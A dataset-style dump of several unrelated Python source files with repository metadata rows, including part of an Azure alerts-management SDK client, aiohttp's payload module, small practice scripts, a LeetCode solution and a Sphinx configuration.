overrides<msrest:optionsforoperations>`.
:return: Alert or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.Alert or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_by_id.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Alert', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_by_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}'}
def change_state(
self, alert_id, new_state, custom_headers=None, raw=False, **operation_config):
"""Change the state of the alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param new_state: New state of the alert. Possible values include:
'New', 'Acknowledged', 'Closed'
:type new_state: str or ~azure.mgmt.alertsmanagement.models.AlertState
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Alert or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.Alert or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.change_state.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
query_parameters['newState'] = self._serialize.query("new_state", new_state, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Alert', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
change_state.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}/changestate'}
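    # Illustrative usage sketch for change_state (not part of the generated SDK file).
    # Assumption (as above): the operations group is reachable as ``client.alerts``.
    # Per the docstring, ``new_state`` may be the ``AlertState`` enum or one of the
    # strings 'New', 'Acknowledged', 'Closed'.
    #
    #     updated = client.alerts.change_state(
    #         alert_id="00000000-0000-0000-0000-000000000000",
    #         new_state="Closed",
    #     )
    #
    # The call POSTs to .../alerts/{alertId}/changestate with ``newState`` as a
    # query parameter and returns the updated ``Alert`` on HTTP 200.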
def get_history(
self, alert_id, custom_headers=None, raw=False, **operation_config):
"""Get the history of the changes of an alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AlertModification or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.AlertModification or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_history.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AlertModification', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_history.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}/history'}
def get_summary(
self, groupby, include_smart_groups_count=None, target_resource=None, target_resource_type=None, target_resource_group=None, monitor_service=None, monitor_condition=None, severity=None, alert_state=None, alert_rule=None, time_range=None, custom_time_range=None, custom_headers=None, raw=False, **operation_config):
"""Summary of alerts with the count each severity.
:param groupby: This parameter allows the result set to be aggregated
by input fields. For example, groupby=severity,alertstate. Possible
values include: 'severity', 'alertState', 'monitorCondition',
'monitorService', 'signalType', 'alertRule'
:type groupby: str or
~azure.mgmt.alertsmanagement.models.AlertsSummaryGroupByFields
:param include_smart_groups_count: Include count of the SmartGroups as
part of the summary. Default value is 'false'.
:type include_smart_groups_count: bool
        :param target_resource: Filter by target resource (which is the full
         ARM ID). Default value is select all.
:type target_resource: str
:param target_resource_type: Filter by target resource type. Default
value is select all.
:type target_resource_type: str
:param target_resource_group: Filter by target resource group name.
Default value is select all.
:type target_resource_group: str
:param monitor_service: Filter by monitor service which is the source
of the alert instance. Default value is select all. Possible values
include: 'Application Insights', 'ActivityLog Administrative',
'ActivityLog Security', 'ActivityLog Recommendation', 'ActivityLog
Policy', 'ActivityLog Autoscale', 'Log Analytics', 'Nagios',
'Platform', 'SCOM', 'ServiceHealth', 'SmartDetector', 'VM Insights',
'Zabbix'
:type monitor_service: str or
~azure.mgmt.alertsmanagement.models.MonitorService
        :param monitor_condition: Filter by monitor condition, which is the
         state of the monitor (alertRule) at the monitor service. Default value
         is to select all. Possible values include: 'Fired', 'Resolved'
:type monitor_condition: str or
~azure.mgmt.alertsmanagement.models.MonitorCondition
        :param severity: Filter by severity. Default value is select all.
Possible values include: 'Sev0', 'Sev1', 'Sev2', 'Sev3', 'Sev4'
:type severity: str or ~azure.mgmt.alertsmanagement.models.Severity
:param alert_state: Filter by state of the alert instance. Default
value is to select all. Possible values include: 'New',
'Acknowledged', 'Closed'
:type alert_state: str or
~azure.mgmt.alertsmanagement.models.AlertState
        :param alert_rule: Filter by the alert rule (monitor) that fired the
         alert instance. Default value is to select all.
:type alert_rule: str
        :param time_range: Filter by time range using one of the listed values.
         Default value is 1 day. Possible values include: '1h', '1d', '7d',
'30d'
:type time_range: str or ~azure.mgmt.alertsmanagement.models.TimeRange
        :param custom_time_range: Filter by custom time range in the format
         <start-time>/<end-time>, where times are in ISO-8601 format.
         Permissible values are within 30 days from query time. Either
         timeRange or customTimeRange can be used, but not both. Default is
         none.
:type custom_time_range: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AlertsSummary or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.AlertsSummary or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_summary.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['groupby'] = self._serialize.query("groupby", groupby, 'str')
if include_smart_groups_count is not None:
query_parameters['includeSmartGroupsCount'] = self._serialize.query("include_smart_groups_count", include_smart_groups_count, 'bool')
if target_resource is not None:
query_parameters['targetResource'] = self._serialize.query("target_resource", target_resource, 'str')
if target_resource_type is not None:
query_parameters['targetResourceType'] = self._serialize.query("target_resource_type", target_resource_type, 'str')
if target_resource_group is not None:
query_parameters['targetResourceGroup'] = self._serialize.query("target_resource_group", target_resource_group, 'str')
if monitor_service is not None:
query_parameters['monitorService'] = self._serialize.query("monitor_service", monitor_service, 'str')
if monitor_condition is not None:
query_parameters['monitorCondition'] = self._serialize.query("monitor_condition", monitor_condition, 'str')
if severity is not None:
query_parameters['severity'] = self._serialize.query("severity", severity, 'str')
if alert_state is not None:
query_parameters['alertState'] = self._serialize.query("alert_state", alert_state, 'str')
if alert_rule is not None:
query_parameters['alertRule'] = self._serialize.query("alert_rule", alert_rule, 'str')
if time_range is not None:
query_parameters['timeRange'] = self._serialize.query("time_range", time_range, 'str')
if custom_time_range is not None:
query_parameters['customTimeRange'] = self._serialize.query("custom_time_range", custom_time_range, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AlertsSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_summary.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alertsSummary'}
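    # Illustrative usage sketch for get_summary (not part of the generated SDK file).
    # Assumption (as above): the operations group is reachable as ``client.alerts``.
    # ``groupby`` is the only required argument; all filters shown are optional.
    #
    #     summary = client.alerts.get_summary(
    #         groupby="severity,alertState",
    #         time_range="7d",
    #         monitor_service="Log Analytics",
    #     )
    #
    # Filters are serialized into query parameters only when they are not None,
    # and the response deserializes into an ``AlertsSummary`` model on HTTP 200.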
| [
"[email protected]"
] | |
aed0c98fbf2de2b3457c2d0a458ec85581b0f37b | 0b4f8d15b3c0d8e878ef8ec2d0e060499286714f | /myvenv/bin/django-admin.py | 5697592d38a1797b795f9d80e8d0d31ecbd6c707 | [] | no_license | kyounginbaek/Openarena_website | 0f25da947add8a9119c3877b32470f75ba614da5 | 818acce8c9def5f5673cd8dbc8e8d8fff6b1a1ce | refs/heads/master | 2022-10-01T18:45:16.123631 | 2017-07-08T09:21:42 | 2017-07-08T09:21:42 | 62,291,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | #!/Users/baekkyoungin/myvenv/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
637b6f1e6ec46f1d584c268016837a63e14fff30 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/get_20200810155009.py | 13e9a436036562052c378984fa398589f08fdc7a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | def produce(num1,num2):
totalValue = 0
for i in range(abs(num1)):
totalValue +=abs(num2)
if num1 < 0 and num2 > 0:
str1 = str(totalValue)
newStr = "-"+ str1
return int(newStr)
elif num1 > 0 and num2 < 0:
str1 = str(totalValue)
newStr = "-"+ str1
return int(newStr)
else:
return totalValue
# print(produce(2,3))
def findProduct(num):
str1 = str(num)
totalValue = 1
for i in str1:
totalValue *=int(i)
print(totalValue)
# 4513 = 4 * 5 * 1 * 3
# A similar way
def getProduct(n):
product = 1
while n != 0:
product *= n %10
n = n // 10
print(product)
def product(num1,num2):
if num2 < 0:
return -product(num1,-num2)
elif num2 == 0 or num1 == 0:
return 0
elif num2 == 1:
print('hh')
print('num1',num1,'num2',num2)
return num1
elif num1 == 1:
print('h')
return num2
else:
print('num1',num1,'num2',num2)
return num1 + product(num1,num2-1)
# print(product(2,3) )
def product1(x,y):
answer = x/(1/y)
print(answer)
# product1(2,3)
# using a while loop
def mult(a, b):
    if a == 0 or b == 0:
        return 0
    result = 0
    # add |a| to itself |b| times; looping on a separate counter also
    # terminates when b is negative (decrementing b itself never would)
    count = abs(b)
    while count > 0:
        result += abs(a)
        count -= 1
    # the product is negative exactly when a and b have opposite signs
    if (a > 0) != (b > 0):
        return -result
    return result
print(mult(2,3))
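# A further sketch in the same spirit (my addition, not part of the original
# history snapshot): multiply without `*` in O(log b) additions by doubling,
# i.e. the Russian-peasant / shift-and-add method.
def mult_fast(a, b):
    negative = (a < 0) != (b < 0)
    a, b = abs(a), abs(b)
    result = 0
    while b:
        if b & 1:          # lowest bit of b set -> add the current a
            result += a
        a += a             # double a without using *
        b >>= 1            # halve b
    return -result if negative else result

# print(mult_fast(2, 3))   # expected 6
# print(mult_fast(-4, 5))  # expected -20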
| [
"[email protected]"
] | |
54a008ec6f6fc4fcd11984a6970366a36a1b055b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/oz.py | 6e46cf0a68992802596650c2ce6e38fe9a41e517 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'OZ':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
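# Note (added): judging from main() and printFunction() above, each input line is
# expected to look like
#     OZ " some words to print "
# with the quotes as standalone whitespace-separated tokens; a line whose first
# token is not 'OZ' prints 'ERROR' and stops processing.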
"[email protected]"
] | |
ac725be804118071e93d65cfe070174d556c8388 | bcc7011cb121e653d831e77206e541675e348337 | /Global_and_Local_Inversions.py | 17fc67eb30ac3008140d41569fefa9ea03994983 | [] | no_license | Built00/Leetcode | 2115c20bf91e9f9226ce952293132bc7a852fe86 | ec3c0d4bd368dd1039f0fed2a07bf89e645a89c3 | refs/heads/master | 2020-11-24T09:12:08.172973 | 2018-03-27T01:23:08 | 2018-03-27T01:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # -*- encoding:utf-8 -*-
# __author__=='Gan'
# We have some permutation A of [0, 1, ..., N - 1], where N is the length of A.
# The number of (global) inversions is the number of i < j with 0 <= i < j < N and A[i] > A[j].
# The number of local inversions is the number of i with 0 <= i < N and A[i] > A[i+1].
# Return true if and only if the number of global inversions is equal to the number of local inversions.
# Example 1:
# Input: A = [1,0,2]
# Output: true
# Explanation: There is 1 global inversion, and 1 local inversion.
# Example 2:
# Input: A = [1,2,0]
# Output: false
# Explanation: There are 2 global inversions, and 1 local inversion.
# Note:
# A will be a permutation of [0, 1, ..., A.length - 1].
# A will have length in range [1, 5000].
# The time limit for this problem has been reduced.
# Leetcode Weekly Contest 69.
# 208 / 208 test cases passed.
# Status: Accepted
# Runtime: 125 ms
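# Why this works (added note): every local inversion is also a global inversion,
# so the two counts are equal exactly when there is no "non-local" inversion,
# i.e. no pair i < j with j > i + 1 and A[i] > A[j]. Keeping the running maximum
# of A[0..i] and comparing it against A[i + 2] detects exactly those pairs in
# O(n) time and O(1) extra space.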
class Solution(object):
def isIdealPermutation(self, A):
"""
:type A: List[int]
:rtype: bool
"""
pre_max = float('-inf')
for i in range(len(A) - 2):
pre_max = max(pre_max, A[i])
if pre_max > A[i + 2]:
return False
return True
if __name__ == '__main__':
print(Solution().isIdealPermutation([1, 0, 2]))
print(Solution().isIdealPermutation([1, 2, 0]))
print(Solution().isIdealPermutation([2, 0, 1]))
| [
"[email protected]"
] | |
f1585623443f7ec42f32fddf1b27b2354e75a163 | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/python/aiohttp/aiohttp/payload.py | eb38c7cdbc403922eef2eec74dd4c0d01c3bdbb3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 12,804 | py | import asyncio
import enum
import io
import json
import mimetypes
import os
import warnings
from abc import ABC, abstractmethod
from itertools import chain
from typing import (
IO,
TYPE_CHECKING,
Any,
ByteString,
Dict,
Iterable,
Optional,
Text,
TextIO,
Tuple,
Type,
Union,
)
from multidict import CIMultiDict
from . import hdrs
from .abc import AbstractStreamWriter
from .helpers import (
PY_36,
content_disposition_header,
guess_filename,
parse_mimetype,
sentinel,
)
from .streams import StreamReader
from .typedefs import JSONEncoder, _CIMultiDict
__all__ = (
"PAYLOAD_REGISTRY",
"get_payload",
"payload_type",
"Payload",
"BytesPayload",
"StringPayload",
"IOBasePayload",
"BytesIOPayload",
"BufferedReaderPayload",
"TextIOPayload",
"StringIOPayload",
"JsonPayload",
"AsyncIterablePayload",
)
TOO_LARGE_BYTES_BODY = 2 ** 20
if TYPE_CHECKING:
from typing import List
class LookupError(Exception):
pass
class Order(str, enum.Enum):
normal = "normal"
try_first = "try_first"
try_last = "try_last"
def get_payload(data: Any, *args: Any, **kwargs: Any) -> "Payload":
return PAYLOAD_REGISTRY.get(data, *args, **kwargs)
def register_payload(
factory: Type["Payload"], type: Any, *, order: Order = Order.normal
) -> None:
PAYLOAD_REGISTRY.register(factory, type, order=order)
class payload_type:
def __init__(self, type: Any, *, order: Order = Order.normal) -> None:
self.type = type
self.order = order
def __call__(self, factory: Type["Payload"]) -> Type["Payload"]:
register_payload(factory, self.type, order=self.order)
return factory
class PayloadRegistry:
"""Payload registry.
note: we need zope.interface for more efficient adapter search
"""
def __init__(self) -> None:
self._first = []
self._normal = []
self._last = []
def get(
self, data: Any, *args: Any, _CHAIN: Any = chain, **kwargs: Any
) -> "Payload":
if isinstance(data, Payload):
return data
for factory, type in _CHAIN(self._first, self._normal, self._last):
if isinstance(data, type):
return factory(data, *args, **kwargs)
raise LookupError()
def register(
self, factory: Type["Payload"], type: Any, *, order: Order = Order.normal
) -> None:
if order is Order.try_first:
self._first.append((factory, type))
elif order is Order.normal:
self._normal.append((factory, type))
elif order is Order.try_last:
self._last.append((factory, type))
else:
raise ValueError(f"Unsupported order {order!r}")
class Payload(ABC):
_default_content_type = "application/octet-stream"
_size = None
def __init__(
self,
value: Any,
headers: Optional[
Union[_CIMultiDict, Dict[str, str], Iterable[Tuple[str, str]]]
] = None,
content_type: Optional[str] = sentinel,
filename: Optional[str] = None,
encoding: Optional[str] = None,
**kwargs: Any,
) -> None:
self._encoding = encoding
self._filename = filename
self._headers = CIMultiDict()
self._value = value
if content_type is not sentinel and content_type is not None:
self._headers[hdrs.CONTENT_TYPE] = content_type
elif self._filename is not None:
content_type = mimetypes.guess_type(self._filename)[0]
if content_type is None:
content_type = self._default_content_type
self._headers[hdrs.CONTENT_TYPE] = content_type
else:
self._headers[hdrs.CONTENT_TYPE] = self._default_content_type
self._headers.update(headers or {})
@property
def size(self) -> Optional[int]:
"""Size of the payload."""
return self._size
@property
def filename(self) -> Optional[str]:
"""Filename of the payload."""
return self._filename
@property
def headers(self) -> _CIMultiDict:
"""Custom item headers"""
return self._headers
@property
def _binary_headers(self) -> bytes:
return (
"".join([k + ": " + v + "\r\n" for k, v in self.headers.items()]).encode(
"utf-8"
)
+ b"\r\n"
)
@property
def encoding(self) -> Optional[str]:
"""Payload encoding"""
return self._encoding
@property
def content_type(self) -> str:
"""Content type"""
return self._headers[hdrs.CONTENT_TYPE]
def set_content_disposition(
self, disptype: str, quote_fields: bool = True, **params: Any
) -> None:
"""Sets ``Content-Disposition`` header."""
self._headers[hdrs.CONTENT_DISPOSITION] = content_disposition_header(
disptype, quote_fields=quote_fields, **params
)
@abstractmethod
async def write(self, writer: AbstractStreamWriter) -> None:
"""Write payload.
writer is an AbstractStreamWriter instance:
"""
class BytesPayload(Payload):
def __init__(self, value: ByteString, *args: Any, **kwargs: Any) -> None:
if not isinstance(value, (bytes, bytearray, memoryview)):
raise TypeError(
"value argument must be byte-ish, not {!r}".format(type(value))
)
if "content_type" not in kwargs:
kwargs["content_type"] = "application/octet-stream"
super().__init__(value, *args, **kwargs)
if isinstance(value, memoryview):
self._size = value.nbytes
else:
self._size = len(value)
if self._size > TOO_LARGE_BYTES_BODY:
if PY_36:
kwargs = {"source": self}
else:
kwargs = {}
warnings.warn(
"Sending a large body directly with raw bytes might"
" lock the event loop. You should probably pass an "
"io.BytesIO object instead",
ResourceWarning,
**kwargs,
)
async def write(self, writer: AbstractStreamWriter) -> None:
await writer.write(self._value)
class StringPayload(BytesPayload):
def __init__(
self,
value: Text,
*args: Any,
encoding: Optional[str] = None,
content_type: Optional[str] = None,
**kwargs: Any,
) -> None:
if encoding is None:
if content_type is None:
real_encoding = "utf-8"
content_type = "text/plain; charset=utf-8"
else:
mimetype = parse_mimetype(content_type)
real_encoding = mimetype.parameters.get("charset", "utf-8")
else:
if content_type is None:
content_type = "text/plain; charset=%s" % encoding
real_encoding = encoding
super().__init__(
value.encode(real_encoding),
encoding=real_encoding,
content_type=content_type,
*args,
**kwargs,
)
class StringIOPayload(StringPayload):
def __init__(self, value: IO[str], *args: Any, **kwargs: Any) -> None:
super().__init__(value.read(), *args, **kwargs)
class IOBasePayload(Payload):
def __init__(
self, value: IO[Any], disposition: str = "attachment", *args: Any, **kwargs: Any
) -> None:
if "filename" not in kwargs:
kwargs["filename"] = guess_filename(value)
super().__init__(value, *args, **kwargs)
if self._filename is not None and disposition is not None:
if hdrs.CONTENT_DISPOSITION not in self.headers:
self.set_content_disposition(disposition, filename=self._filename)
async def write(self, writer: AbstractStreamWriter) -> None:
loop = asyncio.get_event_loop()
try:
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
while chunk:
await writer.write(chunk)
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
finally:
await loop.run_in_executor(None, self._value.close)
class TextIOPayload(IOBasePayload):
def __init__(
self,
value: TextIO,
*args: Any,
encoding: Optional[str] = None,
content_type: Optional[str] = None,
**kwargs: Any,
) -> None:
if encoding is None:
if content_type is None:
encoding = "utf-8"
content_type = "text/plain; charset=utf-8"
else:
mimetype = parse_mimetype(content_type)
encoding = mimetype.parameters.get("charset", "utf-8")
else:
if content_type is None:
content_type = "text/plain; charset=%s" % encoding
super().__init__(
value,
content_type=content_type,
encoding=encoding,
*args,
**kwargs,
)
@property
def size(self) -> Optional[int]:
try:
return os.fstat(self._value.fileno()).st_size - self._value.tell()
except OSError:
return None
async def write(self, writer: AbstractStreamWriter) -> None:
loop = asyncio.get_event_loop()
try:
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
while chunk:
await writer.write(chunk.encode(self._encoding))
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
finally:
await loop.run_in_executor(None, self._value.close)
class BytesIOPayload(IOBasePayload):
@property
def size(self) -> int:
position = self._value.tell()
end = self._value.seek(0, os.SEEK_END)
self._value.seek(position)
return end - position
class BufferedReaderPayload(IOBasePayload):
@property
def size(self) -> Optional[int]:
try:
return os.fstat(self._value.fileno()).st_size - self._value.tell()
except OSError:
return None
class JsonPayload(BytesPayload):
def __init__(
self,
value: Any,
encoding: str = "utf-8",
content_type: str = "application/json",
dumps: JSONEncoder = json.dumps,
*args: Any,
**kwargs: Any,
) -> None:
super().__init__(
dumps(value).encode(encoding),
content_type=content_type,
encoding=encoding,
*args,
**kwargs,
)
if TYPE_CHECKING:
from typing import AsyncIterable, AsyncIterator
_AsyncIterator = AsyncIterator[bytes]
_AsyncIterable = AsyncIterable[bytes]
else:
from collections.abc import AsyncIterable, AsyncIterator
_AsyncIterator = AsyncIterator
_AsyncIterable = AsyncIterable
class AsyncIterablePayload(Payload):
_iter = None
def __init__(self, value: _AsyncIterable, *args: Any, **kwargs: Any) -> None:
if not isinstance(value, AsyncIterable):
raise TypeError(
"value argument must support "
"collections.abc.AsyncIterablebe interface, "
"got {!r}".format(type(value))
)
if "content_type" not in kwargs:
kwargs["content_type"] = "application/octet-stream"
super().__init__(value, *args, **kwargs)
self._iter = value.__aiter__()
async def write(self, writer: AbstractStreamWriter) -> None:
if self._iter:
try:
while True:
chunk = await self._iter.__anext__()
await writer.write(chunk)
except StopAsyncIteration:
self._iter = None
class StreamReaderPayload(AsyncIterablePayload):
def __init__(self, value: StreamReader, *args: Any, **kwargs: Any) -> None:
super().__init__(value.iter_any(), *args, **kwargs)
PAYLOAD_REGISTRY = PayloadRegistry()
PAYLOAD_REGISTRY.register(BytesPayload, (bytes, bytearray, memoryview))
PAYLOAD_REGISTRY.register(StringPayload, str)
PAYLOAD_REGISTRY.register(StringIOPayload, io.StringIO)
PAYLOAD_REGISTRY.register(TextIOPayload, io.TextIOBase)
PAYLOAD_REGISTRY.register(BytesIOPayload, io.BytesIO)
PAYLOAD_REGISTRY.register(BufferedReaderPayload, (io.BufferedReader, io.BufferedRandom))
PAYLOAD_REGISTRY.register(IOBasePayload, io.IOBase)
PAYLOAD_REGISTRY.register(StreamReaderPayload, StreamReader)
PAYLOAD_REGISTRY.register(AsyncIterablePayload, AsyncIterable, order=Order.try_last)
| [
"[email protected]"
] | |
c0e0ba14f5b0d6553e0ab8ea2c7ab3c584612b90 | b65c1f6000af4ddeb7280e7d93bf861fbf1964bc | /docs/conf.py | f738f1816dbe005da47a911e42eba2c58f773d96 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | EricSchles/calc | ef00aaddfec010321867a8287db0a565dbb7985e | eaa1ab227a5a07f5f4f7d2c64a278977cd43cb18 | refs/heads/develop | 2021-01-25T14:33:58.124300 | 2017-10-11T19:29:20 | 2017-10-11T19:29:20 | 72,668,485 | 1 | 0 | null | 2016-11-02T18:17:57 | 2016-11-02T18:17:57 | null | UTF-8 | Python | false | false | 5,864 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# CALC documentation build configuration file, created by
# sphinx-quickstart on Fri Feb 10 12:27:23 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import os
from recommonmark.parser import CommonMarkParser
from recommonmark.transform import AutoStructify
import sphinx_rtd_theme
DOCS_DIR = os.path.dirname(__file__)
BASE_DIR = os.path.dirname(DOCS_DIR)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_parsers = {'.md': CommonMarkParser}
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'CALC'
copyright = '2017, 18F'
author = '18F'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
VERSION_PY_PATH = os.path.join(BASE_DIR, 'hourglass', 'version.py')
_globs = {}
exec(open(VERSION_PY_PATH).read(), _globs) # nosec
version = _globs['__version__']
del _globs
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
